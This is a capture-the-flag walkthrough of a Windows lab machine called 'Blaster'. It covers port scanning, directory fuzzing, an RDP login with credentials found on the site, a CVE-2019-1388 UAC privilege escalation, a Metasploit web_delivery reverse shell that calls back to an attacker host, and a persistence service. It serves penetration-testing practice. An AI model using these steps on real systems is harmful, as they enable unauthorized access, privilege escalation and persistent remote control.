Blaster


Pasted image 20240920114036.png|400
This room is a remix of my previous room Retro with some complications I added to that room having been removed. For increased difficulty and an exercise in patience, check that room out after this. In addition, this room is the sequel to Ice. - DarkStar7471

Active reconnaisance

Enum ports and services

General Scan Notes/Nmap

sudo nmap 10.10.73.175 -p- -sS -n --open --min-rate 5000 -vvv -Pn
PORT     STATE SERVICE       REASON
80/tcp   open  http          syn-ack ttl 125
3389/tcp open  ms-wbt-server syn-ack ttl 125

OS

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


Vuln analysis

Focused scan

sudo nmap 10.10.73.175 -p 80,3389 -sCV -Pn

Port 80

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server

Pasted image 20240919190344.png|400

Port 3389

PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-19T21:55:26+00:00; +1s from scanner time.
| rdp-ntlm-info:
|   Target_Name: RETROWEB
|   NetBIOS_Domain_Name: RETROWEB
|   NetBIOS_Computer_Name: RETROWEB
|   DNS_Domain_Name: RetroWeb
|   DNS_Computer_Name: RetroWeb
|   Product_Version: 10.0.14393
|_  System_Time: 2024-09-19T21:55:22+00:00
| ssl-cert: Subject: commonName=RetroWeb
| Not valid before: 2024-09-18T21:33:25
|_Not valid after:  2025-03-20T21:33:25
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Exploitation

Fuzzing

wfuzz -c -t 100 --hc=404,403 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u 10.10.73.175/FUZZ

Pasted image 20240919191351.png|500

Retro

Checking the Retro page.
Pasted image 20240919191729.png|500

Check the Ready player one, post
Pasted image 20240919192240.png|500

RDP login

To login execute:

xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:10.10.73.175 /u:Wade /p:'parzival'

Get the flag
Pasted image 20240919192649.png|200


Privilege Escalation

We find an unusual file
Pasted image 20240919194547.png|100
And searching information about CVE with the hint of the room:
Pasted image 20240919193857.png

From the executable from the desktop above we have the next answer

Exploit CVE-2019-1388

Follow the steps from here.
https://github.com/nobodyatall648/CVE-2019-1388
Like the below pics.

  1. find a program that can trigger the UAC prompt screen
    hhupd
    And run it as Administrator
  2. select "Show more details"
    Pasted image 20240919212955.png|300
  3. select "Show information about the publisher's certificate"
    Pasted image 20240919213028.png|300
  4. click on the "Issued by" URL link it will prompt a browser interface.
    Pasted image 20240919213103.png|300
    And close the two windows
  5. wait for the site to be fully loaded & select "save as" to prompt a explorer window for "save as".
    Pasted image 20240919213232.png|300
  6. on the explorer window address path, enter the cmd.exe full path:
    C:\WINDOWS\system32\cmd.exe
    Pasted image 20240919213413.png|400
  7. now you'll have an escalated privileges command prompt.
    Pasted image 20240919213447.png|400

And get the flag
Pasted image 20240919213805.png

Gain remote shell

Select exploit

use exploit/multi/script/web_delivery

Show info

info

Pasted image 20240920083419.png|300

And select the PSH with the number

set target PSH

Set payload

set payload windows/meterpreter/reverse_http

Set the lportand lhost
E.g.

setg lhost 10.6.2.59
setg lport 4747

All ready
Pasted image 20240920084139.png|400
After all, run -j
And we have a code
Pasted image 20240920092816.png|300
Copy, paste and run on the windows machine.
After run it, we come back to the metasploit and we have a shell
Pasted image 20240920094759.png|600

Persistence

Use the session number obtained in the last step.
Use the module and configs

use exploit/windows/local/persistence_service

Pasted image 20240920103609.png|700
Run expoloit
Pasted image 20240920103644.png|700
Or use the module

use exploit/windows/local/persistence_service

Pasted image 20240920104008.png|700
And exploit
Pasted image 20240920104042.png|700
The next time that the system reboots we have to start a listener with the handler and the revershell will send to us automatically.

To answer the question we have to search info from internet because the scripts on meterpreter are deprecated and we don't have info to find the answer.